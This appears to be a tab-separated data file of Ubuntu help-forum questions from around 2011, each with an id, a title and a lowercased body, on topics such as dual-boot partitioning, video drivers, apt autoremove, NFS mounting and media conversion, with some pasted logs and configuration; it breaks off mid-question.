28009	what is the difference between the `` entire partition '' and `` entire disc '' ?	i want to install ubuntu alongside my windows 7 operation system . during installation i have three options : install alongside the existing os . remove everything and install ubuntu . manual partitioning ( advanced ) . the above list is not precise ( i do not remember what exactly was written there and i just write options as i have understood them ) . i know that option 2 is not mine . so , i need to choose either 1 or 3 . i do not know which one i need to choose . i want to have a possibility to manually specify space assigned to windows and ubuntu ( for example 40 % for windows and 60 % for ubuntu ) . i chose the 1st option and i saw a window with the following information . allocate drive space by dragging the drive bellow . file ( 48.1 gb ) ubuntu /dev/sda2 ( ntfs ) /dev/sda3 ( ext4 ) 286.6 gb 241.7 gb 2 small partitions are hidden , use the advanced partitioning tool for more control . [ use entire partition ] [ use entire disk ] [ quit ] [ back ] [ install now ] my problem is that i do not understand what i see . in particular i can press [ use entire partition ] or [ use entire disk ] and i do not know what is the difference . moreover , as far as i understand , i can even press [ install now ] without pressing one of the two above mentioned buttons . so , i have 3 options . what is the difference between them ? the most important thing for me is not to delete the old operation system with all the data stored there .
28010	will there still be a separate netbook edition after unity becomes the default desktop environment ?	after a long time of enjoying the bliss of ignorance i 've been reading up a bit on the developments in the land of desktop environments . one thing i did n't find was whether there will still be ( a need for ) a separate netbook edition once unity becomes the default environment on the ubuntu desktop . surely someone here can tell me what i need to know ?
28014	will there be an app-indicators repository in ubuntu 11.04 ?	i heard that panel applets will be disabled in ubuntu 11.04 and there will be indicators only . in maverick we can right click and add panel applets and i use them a lot . so will there be a similar repository or some other way so that we can add new indicators ? thanks !
28016	custom gnome applet in python needs to have root privileges	i 've written a custom gnome panel applet in python that needs to write to some root-owned files . is there a way to make it start with root privileges without using suid ?
28017	getting function keys working on samsung rv510 notebook	i installed 10.10 on my samsung rv510 notebook , but the function keys do n't work . when i use them it seems as if they get locked on , and it becomes impossible to click things in the upper toolbar . does anyone know of any drivers , or a way to get these to work ? i do not want to go back to windows .
28019	how to make chrome/chromium remember passwords in the gnome seahorse keyring ?	is it possible to make chrome or chromium ( as that comes default in the repos ) to use the gnome seahorse as password vault ? i have not found a way to do this for firefox either , but maybe a solution for firefox will lead to a solution for chrome . fyi : epiphany is properly integrated into gnome by default , and does use the default password vault . it would be great to at least have all passwords in a single , actually secure , place , instead of laying around in my home-dir . even better would be if somehow they could re-use eachothers passwords , but that depends on the implementation of this integration , i guess .
28023	how do i make k3b burn an audio cd with mp3 files ?	how do i make k3b burn an audio cd with mp3 files ? right now it 's demanding i only feed it wavs , of all things .
28029	connect to nfs on availability	what would be a good way to automatically mount an nfs when it gets/is available ? i have the following : media server at home , running ubuntu , 10.10 with gui * ) laptop often at home , often on the road or at clients . ubuntu 10.10 with gui . what i 'd like is my laptop connecting to the nfs ( or any other mountable networked filesystem ) so that banshee sees all the music , new podcast-entries ( and video ) from that media-server . i already have firefly ( mt-daapd ) running , which works , but is flakey on both server-side and client-side . but its biggest downside , is that i can not easily fix metadata on files on the media-server this way . daap is read-only by design . i can mount nfs manually , through a sudo mount /media/nfsmultimedia/ . i am not looking for a manual , or howto on setting up a nfs client and server . merely a way to have this more transparently working . obviously i 'd like the nfs to be unmounted if the network is no longer available ( i.e . when i open my laptop-lid on my clients buro ) . it may be , that an nfs is not suited for this , in that case , i 'd love to hear other options . : ) * ) actually : i also have a fileserver , backupserver and webserver to which i 'd like to connect in a somewhat similar way . right now i connect to these over ssh , using gvfs .
28033	how to check the information of current installed video drivers ?	i have just installed ubuntu 10.04 . my cpu usage is high when i do trivial things such as scrolling through a pdf file . so i think my video driver is not properly installed . i want to confirm that by checking the information of my currently installed video driver , such as if there 's a driver installed and what version it is . then i could decide whether to install a new one if it is not up to date . on windows , i could use the device manager , how to do that on ubuntu linux ? i do n't expect a gui solution for this . command line will be just good enough . many thanks .
28039	how to stream music over the network to multiple computers ?	results i want to be able to walk from one room to another and hear the same song playing . like you do if you were listening to the radio in all rooms . i want that effect but i want to listen to my own music , can this be done ? materials ubuntu laptop . mac computer . first alternative i have found and setup the software according to this answer all of the softwares in both computers and server is setup how should i continue ? http : //www.pulseaudio.org/wiki/firststeps
28043	how do i setup sendmail , postfix , or dovecot so that perl can send emails ?	direct question : i want to enable perl to send emails . what package ( s ) should i install to setup a simplistic email server : no need for incoming , only outgoing . i can forward through gmail 's smtp if that 's best ? background : i am programmer with a nightly build script written in perl . i would like to email myself the results of my nightly builds ( especially if there 's an error ) . i 've read about the perl package mail : :sendmail briefly , but if something else is more appropriate , please tell me ! ! i tried the simple aptget install sendmail , but that does n't seem to work . i get the following errors : server said : 421 4.3.0 collect : can not write ./dfp1pfxl7w020719 ( bfcommit , uid=0 , gid=120 ) : no such file or directory message transmission error ( 421 4.3.0 collect : can not write ./dfp1pfxl7w020719 ( bfcommit , uid=0 , gid=120 ) : no such file or directory ) server said : 421 4.3.0 collect : can not write ./dfp1pfxl7w020719 ( bfcommit , uid=0 , gid=120 ) : no such file or directory i 've googled this problem a bit and tried a few things -- adding my username to /etc/mail/trusted-users and such , but to no avail . in other words , i would be most grateful if you could provide simple instructions for setting up an outgoing mail server . i really do n't understand the specifics , but as i understand , i need to forward the mail through an existing smtp server -- so i can use my gmail account if need be ( that 's where i want to send the logs anyway ) . any suggestions would be most greatly appreciated .
28044	why is it not possible to burn a multisession dvd using brasero ?	the multisession function works for cds , but not for dvds . there is no option to add files after creating a multisession dvd . why is it not possible to create a multisession dvd with brasero ? thank you .
28045	how do i add system monitor applet to the gnome panel in netbook edition ?	i need to add the system monitor applet to the gnome panel in ubuntu netbook edition . my setup is as following : 10.10 ( upgraded from 10.04 ) with netbook edition interface installed instead of unity . i 've tried the method of symlinking netbook edition interface so that it would start in the gnome session mode but the panel was not customizable anyway . seems that the panel is more locked in 10.10 than in 10.04 . i suppose that the panel still keeps its applet configuration somewhere , either in config files or in gnome-config . so i think that it 's possible to add an applet by editing the config . does anybody know of files , commands and configuration keys that should be changed to add an applet ? or can i launch an applet by just running the program that renders it ?
28047	where can i get the 11.04 kernel .config file ?	i 'm using maverick with the latest available kernels on kernel.org and building them myself . until now i 've been basing my configuration off the stock maverick kernel and accepting the make oldconfig defaults . i 've been doing this for 3 major releases now so i figure i 'm starting to slip behind the current `` standard '' . i would like to re-base my kernels off the new natty .config file . is this available somewhere online or do i have to download the whole kernel package and extract it ? edit : i 've manually pulled in the config from the latest natty kernel package and i can confirm that i propbably should have done this sooner . a lot of differences between my old `` evolved '' config and the natty default . now if i could just do this without 20 minutes of hunting and downloading the package so i can re-base in the future .
28050	how do i switch to the classic gnome desktop ?	how can i setup the natty classic desktop to be `` really '' classic ? i want to have the menus in the application window and i want to have the normal gnome menu with applications , places and system . any way to get that ?
28052	how do i create a video dvd from vob files ?	i wan na burn a video dvd from existing .vob files that can be played in a home video player . i 've burned one but it does n't have sound . i tried with k3b ( new video dvd project ) because brasero does n't have that option . thanks in advance !
28054	does ubuntu support the openbsd crypto framework ?	i ca n't seem to find an answer to this question . there is the linux crypto api , and the openbsd crypto framework ( ocf ) . i ca n't find anyting on google as to whether ubuntu supports ocf or if the ubuntu kernel uses the linux crypto api . i 'm particularly interested in ubuntu 10.04.2 lts server if that matters .
28056	kvm with windows xp	i want to configure kvm with a windows xp install , can anyone please guide me ? the only virtualization solutions i 've ever used are virtualbox on ubuntu and windows 7 , and vmware on windows 7 . additionally , i 'm unaware if i 've to install any components on a vanilla install to use kvm .
28062	xrandr : jail mouse	i am using xrandr via console to enable/disable secondary monitors . this work fine so far . unfortunately if i move my mouse beyond one screen , it appears on the other one . how can i disable this feature - and lock the mouse to one screen ? i use ubuntu 10.10 and awesome - no gnome/kde .
28064	how to install libreoffice 3.3.1 ?	how do i install the new version of libreoffice ( 3.3.1 ) in ubuntu 10.04 ? i have installed the ppa for libreoffice but no updates show up .
28068	txmt url handler for chromium does not work	i used the instructions in the answer to this question but it wo n't open when i click those links in my browser . i can go to terminal , and type xdg-open and then paste the txmt link , and it will work , so i know my script ( a ruby script @ usr/bin/local ) is working correctly and the protocol handler is set right in gconf . any suggestions ?
28069	how is the system kept secure ?	i understand that if any malware made it 's way into a linux system , it will , at most , gain a user-level privilege and ruin anything within the particular user 's reach , i.e . the user 's own files . but what exactly keeps the malwares from gaining root-level access ? can it not somehow crack the password from within ?
28073	where can i find `` system properties settings '' ?	i ca n't find system properties settings , how can i set it ?
28078	smooth fullscreen 1080p playback	my computer has a pci express x16 socket on the motherboard . what is the minimum graphics card i need to get smooth fullscreen 1080p playback ?
28079	what is the best tool for converting and reading video to be played on dvd players ?	last time i tried brasero it was very slow compared to anything on windows . if there is also a way to speed it up that would be great .
28082	hostname on intranet	i have a test server that is running ubuntu server in a windows network . networking is configured as follows auto eth0 iface eth0 inet dhcp hostname ca the command cat /etc/hostname returns ca . but when i use the command host 10.49.156.196 ( its current ip address ) from another machine on the network , it returns as follows : 196.156.49.10.in-addr.arpa domain name pointer owner-pc.xxxxx.xxx i can access the machine via ssh and browser using ip address , but not by name ca any suggestions ? i tried installing samba/nmbd as suggested in another post , but to no avail .
28084	ubuntu server on airlive access point device	is there anyway to install ubuntu ( server ) on airlive wl-5460ap access point device ?
28086	what are unity 's keyboard and mouse shortcuts ?	in unity , are there any pre-defined shortcuts , e.g . to open the dash or unhide the launcher ?
28088	how do i install axis2 into tomcat6 ?	i 'm trying to install axis2 onto tomcat6 and i 'm having some difficulties . i 've installed tomcat6 using apt and i 've downloaded the axis2.war file and placed it in /usr/share/tomcat6/webapps/ . from the instructions i 'm following , tomcat should now unpack the war file and create and axis2 directory in webapps/ but this is not happening . i can see the default tomcat page on http : //localhost:8080/ but i can not see the axis2 page on http : //localhost:8080/axis2/ any help would be greatly appreciated .
28096	plymouth splash screen looks odd after switching to the nvidia binary driver	i am running ubuntu 10.10 , i switched to nvidia drivers and this has messed up my boot splash screen . it looks like the resolution is off , it looks to be around 800x600 on boot ( during the console stuff ) and when switching to a virtual console ( using alt-f* ) . any ideas how to fix this ? is this a issue with frame buffer resolution ?
28097	when will uds sponsorship final list be announced ?	uds-o is being held at budapest , hungary and the sponsorships are open which closes on 28th of march . my question is when will the final list be announced ? will there be more than one month period for people to apply for visa ? e.g . i live in india and when we apply for schengen visa for the first time , it takes around 2 weeks for the visa interview ( period depends on the rush ) . then another week for interview and visa to be stamped . afaik the application , interview and collection has to be done in person . this is all what i have heard . so will canonical give one month time minimum for people in eastern part of the world or countries where schengen countries have tougher rules for visa ? it would be great if they could finalize the names a bit faster and announce the list by first week of april . i am hoping jorge or jono might come and answer this .
28099	how to restore a system after accidentally removing all kernels ?	i was trying to delete old kernels , but i must have deleted all of the kernels on my ubuntu 11.04 laptop . is there any way to fix this via usb boot or mounting hard drive on another system ?
28103	resize a pendrive linux ?	i 'm running ubuntu from usb media , which has a drive capacity of 250 gb , all existing as one fat32 partition . however , when i created the bootable ubuntu drive , only 4.79 gb were allocated for usage . rather than put files directly into the /cdrom where the drive is mounted , i want to expand what is listed here in aufs to be at least 200 gb . i 'm hopeful that i can do this live . output of df : filesystem 1k-blocks used available use % mounted on aufs 4051904 4050108 0 100 % / none 1542852 284 1542568 1 % /dev /dev/sdb1 244076800 4901648 239175152 3 % /cdrom /dev/loop0 688000 688000 0 100 % /rofs none 1547840 1496 1546344 1 % /dev/shm tmpfs 1547840 4828 1543012 1 % /tmp none 1547840 80 1547760 1 % /var/run none 1547840 0 1547840 0 % /var/lock none 1547840 0 1547840 0 % /lib/init/rw output of fdisk -l : disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00083fe4 device boot start end blocks id system /dev/sdb1 * 1 30401 244196001 c w95 fat32 ( lba ) so basically what i want to do is get /dev/sdb1 to be entirely , or almost entirely read as aufs . i 'm confused over how to do this , as the file systems are all part of /dev/sdb1 on one big partition , rather than separate partitions for separate file systems .
28108	is there a 'contiguous ' option for the magic wand in gimp ?	in photoshop the magic wand tool has a contiguous setting , that when enabled , will cause the magic wand to select only one area . if disabled you will end up with several areas of the same color ( depending on picture and settings of course ) . here 's a picture to illustrate what i fail to explain : can i do this in gimp ?
28112	how can i add file/folder icons ?	how can i create new icons for files or folders ? i can add them to the icon theme , so that i can access them by saying iconname in a launcher or notification , but i do n't know how to make them show up in nautilus . as an example , i want to set an icon for the ubuntu one folder , like how pictures and documents and so on have specific icons . i realize i could change it manually , but that 's not what i 'm looking for .
28115	sync tomboy through ubuntu one and local folders	is there a way to synchronize tomboy notes through ubuntu one and also to a local folder ? i 'd like to have it sync online with ubuntu one but also create back ups in a dropbox folder .
28117	what 's the difference between the various open source ati video drivers ?	when trying to find information about open source ati video drivers i have come across a number of different ones : radeon radeonhd r300g r600g what are the differences in cards supported , 3d/2d performance , power management , and kms support between these various drivers ?
28123	change side pane color in rhythmbox ?	i 've recently changed the sidebar color in nautilus to match the theme . is there something i could do similar for rhythmbox ? thanks for any help !
28124	can a ppa be added to an ubuntu repo mirror ?	in our college , we have mirrors of most new ubuntu distros to save update costs . we would like to add rabbitvcs to the computers , but is available through a ppa and not the official repo . so can a ppa be added to a ( private ) mirror of the ubuntu repo ? ps : i would like to hear on both the technical and legal issues involved .
28127	how to completely turn off session saving ?	i opened system ➜ preferences ➜ startup applications ➜ options and clicked on remember currently running application . i suppose this makes ubuntu memorize ( save a list on some place in disk ) all currently running applications and when you reboot your computer , the os starts with everything in that list . now i want to get rid of it . of course i can close all applications which i do not want to start in startup , and click remember currently running applications again , but this does n't seem to work as expected . for example , yakuake opens differently if i do that . what i want is to completely turn off session saving . maybe i can delete the stored information somehow ?
28132	removal of unused dependencies using `` autoremove ''	i thought running apt-get autoremove without any following argument removes all unused dependencies left on the system , while running apt-get autoremove xxx removes xxx and its unused dependencies . however i discovered otherwise . running apt-get autoremove xxx not only removes xxx and its unused dependencies , it also removes all other unused dependencies . i then tried running apt-get remove -- auto-remove xxx , thinking that this would remove only xxx and its unused dependencies . to my surprise , this also removed xxx , its unused dependencies , and all other unused dependencies . this leads me to two related questions . ( 1 ) is this the intended behaviour of the commands ? ( 2 ) is there an easy way to remove xxx and its unused dependencies without removing other unused dependencies ? ( it appears that aptitude remove also behaves in a similar way . )
28133	where do i submit a .desktop file updated with the unity launcher api ?	specifically , i decided to update the desktop file for google chrome to add a static quicklist ( like is already present in windows 7 ) . where do i have to submit it for inclusion in ubuntu ?
28135	how to open eml files ?	i 've got a mail with eml file attached . i 'm using thunderbird but it does n't open it . could anybody suggest program to open eml files ? update : i do n't want to import my mailbox i want only read the content of eml file .
28136	how to open chm documents ?	i have a couple of medical books most of them are in a .chm format . i wondered would there be a file format that can be easier to navigate , supported and of equal file size in ubuntu ? because if there was any , i will start converting all those books and probably using them with less hassle on all my ubuntu pcs and my android phone .
28141	why wo n't tekken 3 start ?	i want to play tekken 3 but it does n't start on ubuntu . what should i do ?
28146	usb mouse does not work on boot	my problem is pretty much a duplicate of the one described in usb mouse late to load , but the solution there has not worked for me . i 'm running the same os and experiencing the exact same issue . it disappears after 10 seconds or so . booting with the options specified in the other question did not fix it : / thanks in advance . sheepz @ sheepz-desktop : ~ $ dmesg | egrep `` hci|usb '' [ 0.188000 ] usbcore : registered new interface driver usbfs [ 0.188000 ] usbcore : registered new interface driver hub [ 0.188000 ] usbcore : registered new device driver usb [ 0.358613 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.358627 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.358637 ] uhci_hcd : usb universal host controller interface driver [ 0.358683 ] uhci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.358691 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 0.358695 ] uhci_hcd 0000:00:1d.0 : uhci host controller [ 0.358726 ] uhci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 1 [ 0.358758 ] uhci_hcd 0000:00:1d.0 : irq 23 , io base 0x0000e100 [ 0.358927 ] uhci_hcd 0000:00:1d.1 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 0.358932 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 [ 0.358935 ] uhci_hcd 0000:00:1d.1 : uhci host controller [ 0.358964 ] uhci_hcd 0000:00:1d.1 : new usb bus registered , assigned bus number 2 [ 0.358991 ] uhci_hcd 0000:00:1d.1 : irq 19 , io base 0x0000e200 [ 0.359132 ] uhci_hcd 0000:00:1d.2 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 0.359137 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 [ 0.359139 ] uhci_hcd 0000:00:1d.2 : uhci host controller [ 0.359165 ] uhci_hcd 0000:00:1d.2 : new usb bus registered , assigned bus number 3 [ 0.359193 ] uhci_hcd 0000:00:1d.2 : irq 18 , io base 0x0000e300 [ 0.359327 ] uhci_hcd 0000:00:1d.3 : pci int d - > gsi 16 ( level , low ) - > irq 16 [ 0.359332 ] uhci_hcd 0000:00:1d.3 : setting latency timer to 64 [ 0.359334 ] uhci_hcd 0000:00:1d.3 : uhci host controller [ 0.359360 ] uhci_hcd 0000:00:1d.3 : new usb bus registered , assigned bus number 4 [ 0.359387 ] uhci_hcd 0000:00:1d.3 : irq 16 , io base 0x0000e400 [ 0.731933 ] usb 1-1 : new full speed usb device using uhci_hcd and address 2 [ 1.023859 ] usb 1-2 : new full speed usb device using uhci_hcd and address 3 [ 16.136175 ] usb 1-2 : device descriptor read/64 , error -110 [ 31.352481 ] usb 1-2 : device descriptor read/64 , error -110 [ 31.568485 ] usb 1-2 : new full speed usb device using uhci_hcd and address 4 [ 46.680794 ] usb 1-2 : device descriptor read/64 , error -110 [ 61.903555 ] usb 1-2 : device descriptor read/64 , error -110 [ 62.119671 ] usb 1-2 : new full speed usb device using uhci_hcd and address 5 [ 72.541078 ] usb 1-2 : device not accepting address 5 , error -110 [ 72.653194 ] usb 1-2 : new full speed usb device using uhci_hcd and address 6 [ 83.066637 ] usb 1-2 : device not accepting address 6 , error -110 [ 83.178615 ] usb 3-1 : new low speed usb device using uhci_hcd and address 2 [ 83.562546 ] usbcore : registered new interface driver hiddev [ 83.578827 ] input : logitech usb-ps/2 optical mouse as /devices/pci0000:00/0000:00:1d.2/usb3/3-1/3-1:1.0/input/input3 [ 83.579016 ] generic-usb 0003:046d : c01d.0001 : input , hidraw0 : usb hid v1.10 mouse [ logitech usb-ps/2 optical mouse ] on usb-0000:00:1d.2-1/input0 [ 83.579244 ] usbcore : registered new interface driver usbhid [ 83.579246 ] usbhid : usb hid core driver [ 114025.224407 ] usb 3-1 : usb disconnect , address 2 sheepz @ sheepz-desktop : ~ $ dmesg | egrep `` hci|usb '' [ 0.188000 ] usbcore : registered new interface driver usbfs [ 0.188000 ] usbcore : registered new interface driver hub [ 0.188000 ] usbcore : registered new device driver usb [ 0.358613 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.358627 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.358637 ] uhci_hcd : usb universal host controller interface driver [ 0.358683 ] uhci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.358691 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 0.358695 ] uhci_hcd 0000:00:1d.0 : uhci host controller [ 0.358726 ] uhci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 1 [ 0.358758 ] uhci_hcd 0000:00:1d.0 : irq 23 , io base 0x0000e100 [ 0.358927 ] uhci_hcd 0000:00:1d.1 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 0.358932 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 [ 0.358935 ] uhci_hcd 0000:00:1d.1 : uhci host controller [ 0.358964 ] uhci_hcd 0000:00:1d.1 : new usb bus registered , assigned bus number 2 [ 0.358991 ] uhci_hcd 0000:00:1d.1 : irq 19 , io base 0x0000e200 [ 0.359132 ] uhci_hcd 0000:00:1d.2 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 0.359137 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 [ 0.359139 ] uhci_hcd 0000:00:1d.2 : uhci host controller [ 0.359165 ] uhci_hcd 0000:00:1d.2 : new usb bus registered , assigned bus number 3 [ 0.359193 ] uhci_hcd 0000:00:1d.2 : irq 18 , io base 0x0000e300 [ 0.359327 ] uhci_hcd 0000:00:1d.3 : pci int d - > gsi 16 ( level , low ) - > irq 16 [ 0.359332 ] uhci_hcd 0000:00:1d.3 : setting latency timer to 64 [ 0.359334 ] uhci_hcd 0000:00:1d.3 : uhci host controller [ 0.359360 ] uhci_hcd 0000:00:1d.3 : new usb bus registered , assigned bus number 4 [ 0.359387 ] uhci_hcd 0000:00:1d.3 : irq 16 , io base 0x0000e400 [ 0.731933 ] usb 1-1 : new full speed usb device using uhci_hcd and address 2 [ 1.023859 ] usb 1-2 : new full speed usb device using uhci_hcd and address 3 [ 16.136175 ] usb 1-2 : device descriptor read/64 , error -110 [ 31.352481 ] usb 1-2 : device descriptor read/64 , error -110 [ 31.568485 ] usb 1-2 : new full speed usb device using uhci_hcd and address 4 [ 46.680794 ] usb 1-2 : device descriptor read/64 , error -110 [ 61.903555 ] usb 1-2 : device descriptor read/64 , error -110 [ 62.119671 ] usb 1-2 : new full speed usb device using uhci_hcd and address 5 [ 72.541078 ] usb 1-2 : device not accepting address 5 , error -110 [ 72.653194 ] usb 1-2 : new full speed usb device using uhci_hcd and address 6 [ 83.066637 ] usb 1-2 : device not accepting address 6 , error -110 [ 83.178615 ] usb 3-1 : new low speed usb device using uhci_hcd and address 2 [ 83.562546 ] usbcore : registered new interface driver hiddev [ 83.578827 ] input : logitech usb-ps/2 optical mouse as /devices/pci0000:00/0000:00:1d.2/usb3/3-1/3-1:1.0/input/input3 [ 83.579016 ] generic-usb 0003:046d : c01d.0001 : input , hidraw0 : usb hid v1.10 mouse [ logitech usb-ps/2 optical mouse ] on usb-0000:00:1d.2-1/input0 [ 83.579244 ] usbcore : registered new interface driver usbhid [ 83.579246 ] usbhid : usb hid core driver
28150	chrome/chromium middle mouse button for scroll linux , mac	clicking the middle button does't allow me scroll the page . is there any way to fix this behavior ? information : ubuntu 10.10 chromium 9.0.597.94 logitech mx518 update : also chrome , and the other chromium based ones .
28152	is it possible to play world of warcraft ?	it 's the only reason i preserve windows on my computer . however , is it possible to play the game in ubuntu smoothly ?
28155	how to check system performance ?	is there a way to measure the performance of 3d acceleration , java applets , firefox scrolling etc . with a tool and compare it with lets say a windows os or other users having almost the same hardware ? maybe it is a setup issue where some fundamental drivers are missing or something ?
28161	bazaar plugin for anjuta	i want to use anjuta for development and bazaar for version control . but the launchpad project listed on this page is empty . http : //wiki.bazaar.canonical.com/ideintegration is it dead ? is there another plugin ?
28162	what snapshot software do you recommend ?	hi , is there a snapshot software for ubuntu ? something like snagit ? the idea is many times i have to take the snapshot and edit the image to crop to my region of interest , snagit does that automatically and very nicely . another feature is to take a snapshot of text ( that ca n't be otherwise copied - like text in a photo ) and then parse it into actual text document using an ocr technology . thanks
28165	how do i remove the guest session option from the shutdown menu ?	on the indicator shutdown menu in ubuntu 10.04 , there is a `` guest session '' option . how do i remove this ?
28170	can i make a compiz animation rule for wine menus ?	wine menus appear and disappear with the glide 2 effect . this looks good for dialogs but not so good for menus . i would make a custom rule to apply fade in/fade out instead , but i do n't know the window type for wine menus . i 've tried using xwininfo but there is no way to select the wine menu with it .
28173	ubuntu installer to only install selected packages	how can i make a custom installer to install only the packages i specify ( including proprietary components and drivers ) and preconfigure config files like /etc/network/interfaces beforehand ?
28175	touchpad suddenly stopped working	the touchpad suddenly stopped working in my hp pavilion laptop . external mouse works . i 'm running ubuntu 10.10 . what are my options ?
28176	how do i run pulseaudio in a headless server installation ?	pulseaudio is the standard audio server in desktop installations . however in a server installation audio services and thus pulseaudio are not provided . how do i install and make use of pulseaudio in a headless server ?
28185	can empathy show what rhythmbox track i 'm listening to ?	there was an msn messenger feature that would show what track you were currently listening to . i 'm using rhythmbox as my music player . does empathy have this feature ?
28187	apt-get and -d option ( download only ) - what about packages to be removed ?	what does the -d option of apt-get do when there are packages to be removed ( i got the list of actions by the -- simulate option ) ?
28191	how can i convert a .m2ts to .mkv ?	does anyone know of an application that allows me to convert an m2ts file to mkv or some other format ? preferably something that allows me to convert it directly , rather than convert the whole blu-ray disc . hddump did n't work because it does n't convert only the m2ts file , and the contents are on a .iso that i mounted virtually .
28195	`` untrusted packages could compromise your system 's security '' appears while trying to install anything	i 've freshly installed ubuntu 10.04 on a new computer . i 'm trying to install an application that i need onto it ( my old computer is broken and i have to send it for service ) . i 've managed to install texlive , but then i ca n't install anything else . all of the software i want installed is the same software that i had successfully installed on my old computer previously ( using the same version of ubuntu ) . i do n't understand why the terminal gives this warning ( sorry , the terminal speaks half english , half polish , but i hope it 's enough ) : maria @ marysia-ubuntu : ~ $ sudo aptitude install emacs czytanie list pakietów ... gotowe budowanie drzewa zależności odczyt informacji o stanie ... gotowe reading extended state information initializing package states ... gotowe the following new packages will be installed : emacs emacs23 { a } emacs23-bin-common { a } emacs23-common { a } emacsen-common { a } 0 packages upgraded , 5 newly installed , 0 to remove and 0 not upgraded . need to get 23,9mb of archives . after unpacking 73,8mb will be used . do you want to continue ? [ y/n/ ? ] y warning : untrusted versions of the following packages will be installed ! untrusted packages could compromise your system 's security . you should only proceed with the installation if you are certain that this is what you want to do . emacs emacs23-bin-common emacsen-common emacs23-common emacs23 do you want to ignore this warning and proceed anyway ? to continue , enter `` yes '' ; to abort , enter `` no '' i was trying to install other editors as well , with the same result . as i decided that i might be sure that i know the package i want to install is secure , i finally entered `` yes '' . the installation ended successfully , but the editor does n't understand .tex files ( and the .tex files themselves are known to be good ) : this is pdftex , version 3.1415926-1.40.10 ( tex live 2009/debian ) restricted \write18 enabled . entering extended mode ( ./szarfi.tex ! undefined control sequence . l.2 \documentclass { book } ? what 's more , i 've realised that in synaptic manager there are n't any packages which are marked as supported by canonical ... . any tips ? thanks in advance . p.s . apt sources before using update : maria @ marysia-ubuntu : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 10.04.2 lts _lucid lynx_ - release i386 ( 20110211.1 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid main restricted deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates main restricted deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid universe deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid universe deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates universe deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid multiverse deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu lucid-security main restricted deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe deb http : //security.ubuntu.com/ubuntu lucid-security multiverse deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse maria @ marysia-ubuntu : ~ $ after using update , it 's almost fine . i 've managed to install 3 applications ( texlive , texworks and ekg ) , and synaptic shows icons for `` supported by cannonical '' . but problems with connection persist . i 'm connected to internet , i can use chat , but sometimes i ca n't open any web pages . i 'm not sure if it this is part of the same problem , or if one is resolved and for the other one i should write a separate post . list of apt sources after using update : maria @ marysia-ubuntu : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 10.04.2 lts _lucid lynx_ - release i386 ( 20110211.1 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid main restricted deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates main restricted deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid universe deb-src http : 